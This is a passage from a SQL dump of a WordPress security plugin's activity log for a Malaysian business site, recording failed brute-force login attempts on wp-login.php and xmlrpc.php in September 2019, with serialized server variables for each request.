Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"68.183.173.177\";s:11:\"REMOTE_PORT\";s:5:\"44034\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXapLxP-OCjWSxFz-ul-mgAAAJY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568057647.9603\";s:12:\"REQUEST_TIME\";s:10:\"1568057647\";}}','notice','2019-09-09 19:34:09','2019-09-09 19:34:08',18214352,19512088,'https://bintara.com.my/xmlrpc.php',1,0,'68.183.173.177'),(23730,0,'notification_center','send_scheduled','a:2:{s:13:\"notifications\";a:1:{i:0;s:6:\"digest\";}s:6:\"silent\";b:0;}','debug','2019-09-09 20:26:54','2019-09-09 20:26:50',17745352,18207392,'http://bintara.com.my/send-quotation-logitech',1,0,'54.165.59.7'),(23731,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"178.128.90.9\";s:11:\"REMOTE_PORT\";s:5:\"39868\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXcY5EgJZxitCRbj1aOc2AAAABE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568086244.1299\";s:12:\"REQUEST_TIME\";s:10:\"1568086244\";}}','notice','2019-09-10 03:30:45','2019-09-10 03:30:44',17702080,19193952,'https://bintara.com.my/wp-login.php',1,0,'178.128.90.9'),(23732,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"178.128.90.9\";s:11:\"REMOTE_PORT\";s:5:\"40104\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXcY5kgJZxitCRbj1aOc2wAAAA8\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568086246.4642\";s:12:\"REQUEST_TIME\";s:10:\"1568086246\";}}','notice','2019-09-10 03:30:48','2019-09-10 03:30:46',18214480,19510832,'https://bintara.com.my/xmlrpc.php',1,0,'178.128.90.9'),(24685,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"104.131.58.179\";s:11:\"REMOTE_PORT\";s:5:\"41156\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEmmUViJhUiKk@yAofG1gAAAZU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568745113.4808\";s:12:\"REQUEST_TIME\";s:10:\"1568745113\";}}','notice','2019-09-17 18:31:54','2019-09-17 18:31:53',18257600,19556776,'https://bintara.com.my/xmlrpc.php',1,0,'104.131.58.179'),(24686,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"89\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"148.72.150.26\";s:11:\"REMOTE_PORT\";s:5:\"38350\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEm6kViJhUiKk@yAofHAAAAAZQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568745194.4603\";s:12:\"REQUEST_TIME\";s:10:\"1568745194\";}}','notice','2019-09-17 18:33:15','2019-09-17 18:33:14',17739592,19231432,'https://bintara.com.my/wp-login.php',1,0,'148.72.150.26'),(24687,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"148.72.150.26\";s:11:\"REMOTE_PORT\";s:5:\"39888\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEm7X-mRYMgL5SYt2EVlAAAAVc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568745197.8759\";s:12:\"REQUEST_TIME\";s:10:\"1568745197\";}}','notice','2019-09-17 18:33:19','2019-09-17 18:33:18',18254480,19552568,'https://bintara.com.my/xmlrpc.php',1,0,'148.72.150.26'),(24688,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"198.23.59.60\";s:11:\"REMOTE_PORT\";s:5:\"51232\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEoeUViJhUiKk@yAofHvQAAAZY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568745593.5261\";s:12:\"REQUEST_TIME\";s:10:\"1568745593\";}}','notice','2019-09-17 18:39:55','2019-09-17 18:39:53',17740648,19231488,'https://bintara.com.my/wp-login.php',1,0,'198.23.59.60'),(24689,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"198.23.59.60\";s:11:\"REMOTE_PORT\";s:5:\"51642\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEofPgg4cIpXyxKa545eAAAAE0\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568745596.6831\";s:12:\"REQUEST_TIME\";s:10:\"1568745596\";}}','notice','2019-09-17 18:39:58','2019-09-17 18:39:57',18257632,19557776,'https://bintara.com.my/xmlrpc.php',1,0,'198.23.59.60'),(24690,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"119.28.180.62\";s:11:\"REMOTE_PORT\";s:5:\"41062\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYEp5kViJhUiKk@yAofIoAAAAYc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568745958.7053\";s:12:\"REQUEST_TIME\";s:10:\"1568745958\";}}','notice','2019-09-17 18:45:59','2019-09-17 18:45:59',17739472,19231040,'https://bintara.com.my/wp-login.php',1,0,'119.28.180.62'),(24691,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 